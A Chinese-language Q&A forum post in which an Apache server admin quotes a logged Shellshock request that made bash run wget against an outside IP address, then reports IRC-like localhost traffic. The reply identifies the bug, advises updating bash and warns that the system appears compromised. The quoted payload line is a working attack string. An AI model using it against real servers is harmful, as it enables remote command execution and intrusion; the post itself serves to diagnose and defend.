0

我在 Apache 2.2.22 上运行了几个虚拟主机,并且在日志中注意到一个相当惊人的事件,来自冰岛的“安全扫描程序”能够使用以下 http 请求行将文件 wget 到 cgi-bin 目录中:

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

它有效地下载了有问题的文件。
任何人都可以解释这个请求是如何管理实际执行 bash 命令的吗?

自然地,cgi-bin 不应该是可写的,但它仍然有助于理解这种类型的漏洞利用是如何运作的,以及如果没有某种方法可以更改 Apache 配置参数以便永远不会执行请求命令......

这可能无关紧要,但几个小时后,内部接口开始出现一连串奇怪的请求,每 2 秒发生一次:

host:    ":443"   request:  "NICK netply"    source ip: 127.0.0.1
4

1 回答 1

1

这是 bash 中的一个漏洞,它通过 Apache 暴露,称为“Shellshock”或“bash bug”,允许攻击者在本地和远程执行任意命令,使其成为一个非常严重的漏洞。

您需要更新bash,但您显示出系统已经受到威胁的迹象。有关 shellshock 的更多信息,包括检测和修复,请参阅:

digitalocean.com

震惊网

于 2014-09-29T08:40:09.417 回答